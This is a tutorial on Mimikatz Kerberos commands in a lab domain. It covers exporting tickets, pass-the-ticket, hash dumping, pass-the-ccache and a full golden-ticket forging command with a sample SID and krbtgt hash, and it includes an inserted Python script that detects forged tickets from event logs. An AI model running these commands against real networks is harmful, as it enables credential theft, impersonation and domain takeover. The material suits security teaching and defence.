This article will probably be part of a series of articles on the tool known as Mimikatz, which was written in the C programming language. It is mainly used for extracting Kerberos tickets from memory and generating golden tickets.
Table of Contents
- Kerberos::list
- Kerberos::list /export
- Kerberos::ptt ticket.kirbi
- Kerberos::tgt
- Kerberos::ask
- Kerberos::hash
- Kerberos::golden
- Kerberos::ptc
- Kerberos::clist
- Kerberos::purge
In this scenario, we will be using Mimikatz on the client machine to find out which tickets are available on the client system.
Kerberos::list
We'll use the command:
kerberos::list
This list command will display all the tickets available on the client machine.
As you can see from the above screenshot, there are 2 tickets on our client machine. The list command shows information such as:
- Start/End time of the ticket
- Server name
- Client name
- and the Flags
Kerberos::list /export
Now that this information is available, if we want to save these tickets for future use or reference, we use the following command:
kerberos::list /export
This will save the above TGT tickets in the Mimikatz folder in the kirbi format.
Now that the ticket has been saved in the Mimikatz folder, we renamed it to ticket.kirbi for ease of use. Note that this is not a mandatory step.
Since we now have this ticket, we'll now see how it can be used later on for lateral movement, so that we can perform the pass the ticket attack.
To perform pass the ticket (ptt) we issue the following command:
kerberos::ptt ticket.kirbi
Once the command has executed successfully, we issue another command, misc::cmd, which opens a command prompt session. We can see that the command prompt session has been opened as the domain user ignite\aarti.
Let's try to browse the directory of the server as the user aarti by typing the following command in the command prompt:
dir \\192.168.1.188\c$ (192.168.1.188 is the server IP address)
As you can see, we are able to view all the directories of the server.
So, being a non-administrator domain account, the user aarti was able to check the directory listing of the C drive of the server by using a PTT attack.
Kerberos TGT
To display all TGTs (Ticket Granting Tickets), we can use the following command:
kerberos::tgt
Kerberos ASK
It allows you to obtain a service ticket. The syntax for running this command is as follows:
kerberos::ask /target:<SPN>, where the SPN here is cifs/dc1.ignite.local
kerberos::ask /target:cifs/dc1.ignite.local
To display all the service tickets, we issue the command:
kerberos::list
As we can see, we now have 3 tickets listed below.
Kerberos Hash
kerberos::hash
This will dump all hashes available on the client machine.
Kerberos::golden
Golden Ticket Attack (GTA)
Golden Tickets are forged Ticket-Granting Tickets (TGTs), also known as authentication tickets. Some basic information needed to perform this attack is:
- Domain name: ignite.local
- SID: S-1-5-21-1255168540-3690278322-1592948969
- KRBTGT Hash: 5cced0cb593612f08cf4a0b4f0bcb017
- And a user to impersonate: raaz
So if we have the domain name, the SID and the hash value of krbtgt, then we can go for a pass the ticket attack by generating a fake golden ticket.
So the command for performing the GTA is as follows:
kerberos::golden /user:raaz /domain:ignite.local /sid:S-1-5-21-1255168540-3690278322-1592948969 /krbtgt:5cced0cb593612f08cf4a0b4f0bcb017 /id:500 /ptt
Where /id:500 is for administrator privilege (500 is the RID of the built-in Administrator account).
As shown above, the command has completed successfully. Now let's launch the command prompt via Mimikatz by issuing the command: misc::cmd
Through the new command prompt, we are able to access the server directories, the same as in the earlier examples.
Another method of golden ticket attack can be carried out by using the tool impacket.
When using Mimikatz or Rubeus, they generate the ticket as a .kirbi file. But if we use impacket for the golden ticket attack in order to get the ticket, it will not give you the ticket in kirbi format. It gives you the ticket in .ccache format.
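The injected and forged tickets from the pass the ticket and golden ticket sections above leave a characteristic gap on the domain controller: a service ticket request (event 4769) for an account that was never issued a TGT (event 4768), or whose TGT was issued to a different client address. The following Python script is an added example, not part of the original article: it correlates constructed sample 4768/4769 records using those two heuristics; the record layout and the 10-hour TGT lifetime are assumptions.

```python
"""Correlate Kerberos TGT (4768) and service-ticket (4769) events to flag
tickets the KDC never issued, or that are used from another host.
Constructed sample records, not real logs; field names loosely mirror the
Windows Security log fields (TargetUserName, IpAddress, TicketEncryptionType)."""
from datetime import datetime, timedelta

# Constructed sample events. RC4-HMAC (etype 0x17) is what a golden ticket
# built from the krbtgt NT hash uses, while modern clients negotiate AES.
EVENTS = [
    {"id": 4768, "time": "2024-01-10T08:00:00", "user": "aarti", "ip": "192.168.1.50", "etype": "0x12"},
    {"id": 4769, "time": "2024-01-10T08:05:00", "user": "aarti", "ip": "192.168.1.50", "etype": "0x12", "service": "cifs/dc1"},
    # aarti's TGT was issued to .50, but a service ticket is presented from .60:
    {"id": 4769, "time": "2024-01-10T09:00:00", "user": "aarti", "ip": "192.168.1.60", "etype": "0x12", "service": "cifs/dc1"},
    # raaz never obtained a TGT from the KDC, yet presents an RC4 service ticket:
    {"id": 4769, "time": "2024-01-10T10:00:00", "user": "raaz", "ip": "192.168.1.60", "etype": "0x17", "service": "cifs/dc1"},
]

TGT_LIFETIME = timedelta(hours=10)  # assumed default domain policy; adjust to yours

def find_suspicious_tickets(events, lifetime=TGT_LIFETIME):
    """Return (user, ip, reason) for each 4769 lacking a matching 4768."""
    tgts = [e for e in events if e["id"] == 4768]
    findings = []
    for e in events:
        if e["id"] != 4769:
            continue
        t = datetime.fromisoformat(e["time"])
        # TGTs for the same account issued within one ticket lifetime before this request
        recent = [g for g in tgts if g["user"].lower() == e["user"].lower()
                  and 0 <= (t - datetime.fromisoformat(g["time"])).total_seconds() <= lifetime.total_seconds()]
        if not recent:
            reason = "service ticket with no TGT issued by the KDC"
            if e["etype"] == "0x17":
                reason += " (RC4 etype, typical of hash-forged tickets)"
            findings.append((e["user"], e["ip"], reason))
        elif not any(g["ip"] == e["ip"] for g in recent):
            findings.append((e["user"], e["ip"], "TGT issued to a different client address"))
    return findings

if __name__ == "__main__":
    for user, ip, reason in find_suspicious_tickets(EVENTS):
        print(f"{user}@{ip}: {reason}")
```

Both heuristics only hold when 4768 events from every domain controller are collected centrally; a TGT issued by a DC whose log is missing would otherwise look like a forged ticket.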
Kerberos::ptc
So if we have the ticket in ccache format, then we can perform pass the ccache as shown below. The command is:
kerberos::ptc Administrator.ccache
misc::cmd will open a new command prompt in which we are able to access the server directories, the same as in our earlier examples.
Kerberos::clist
If we want to list all the ccache files that exist on the client system, we use the following command:
kerberos::clist Administrator.ccache
Kerberos::purge
If we want to delete all the tickets, whether in ccache or kirbi format, we can use the following command:
kerberos::purge
Author: Tirut Hawoldar is a Cyber Security Enthusiast and CTF player with 15 years of experience in IT Security and Infrastructure. Can be contacted on LinkedIn